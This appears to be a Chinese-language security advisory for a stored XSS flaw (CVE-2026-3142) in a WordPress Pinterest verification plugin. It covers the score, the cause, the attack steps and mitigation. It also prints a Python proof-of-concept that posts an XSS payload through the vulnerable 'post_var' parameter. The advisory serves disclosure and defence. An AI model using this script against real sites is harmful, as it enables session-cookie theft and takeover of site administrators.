CVE-2026-3142 CVSS 6.4 中危

CVE-2026-3142 WordPress插件存储型XSS漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3142

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Pinterest Site Verification plugin for WordPress

漏洞概述

WordPress的Pinterest Site Verification插件在1.8及之前版本中存在存储型XSS漏洞。由于'post_var'参数缺乏足够的输入清理和输出转义，拥有订阅者及以上权限的认证攻击者可以在页面中注入任意Web脚本。当其他用户访问被注入的页面时，恶意脚本将在其浏览器中执行。

技术细节

该漏洞位于PinterestMetaTagSiteVerification.php文件中。插件在处理Pinterest站点验证标签时，直接从'post_var'参数获取用户输入，并且在未经过滤的情况下将其存储到数据库中。当后续渲染页面时，这些数据未经上下文相关的输出转义（如使用esc_html函数）直接插入HTML文档。由于CVSS向量为S:C（范围变更），攻击者可利用低权限账户（如订阅者）发起攻击，通过诱导管理员访问受影响页面，从而窃取管理员会话Cookie或执行管理员权限下的操作。

攻击链分析

STEP 1

攻击者注册或获取一个低权限账户（如订阅者 Subscriber）。

STEP 2

攻击者向插件处理端点发送POST请求，在'post_var'参数中注入恶意JavaScript代码。

STEP 3

插件将恶意数据未经消毒直接存储在WordPress数据库中。

STEP 4

管理员或其他用户访问包含该插件的页面（如前端页面或后台设置页）。

STEP 5

服务器从数据库读取恶意数据并输出到HTML页面，触发浏览器执行恶意脚本，窃取凭证或执行操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin.php?page=pinterest-site-verification"
login_cookie = {
    "wordpress_logged_in_xxx": "your_auth_cookie_here"
}

# Malicious payload to be stored
xss_payload = "<img src=x onerror=alert('CVE-2026-3142')>"

# Exploit data sent via POST request
exploit_data = {
    "action": "save_settings",
    "post_var": xss_payload  # Vulnerable parameter
}

try:
    response = requests.post(target_url, data=exploit_data, cookies=login_cookie)
    if response.status_code == 200:
        print("[+] Payload injected successfully.")
        print("[+] Check the plugin settings page to trigger the XSS.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Pinterest Site Verification plugin <= 1.8

防御指南

临时缓解措施

建议立即检查并更新该插件至最新版本。在未修复前，可暂时禁用插件以阻断攻击链，并严格限制低权限用户（订阅者）的后台访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表